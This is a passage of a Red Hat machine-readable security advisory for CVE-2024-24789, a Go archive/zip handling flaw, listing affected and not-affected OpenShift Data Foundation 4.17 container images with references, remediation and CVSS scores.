"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2292668"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Golang. The ZIP implementation of the Go language archive/zip library behaves differently than the rest of the ZIP file format implementations. When handling ZIP files with a corrupted central directory record, the library skips over the invalid record and processes the next valid one. This flaw allows a malicious user to access hidden information or files inside maliciously crafted ZIP files.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "golang: archive/zip: Incorrect handling of certain ZIP files",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
],
"known_not_affected": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-24789"
},
{
"category": "external",
"summary": "RHBZ#2292668",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2292668"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-24789",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-24789"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-24789",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24789"
}
],
"release_date": "2024-06-04T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-30T14:25:22+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:8676"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"products": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
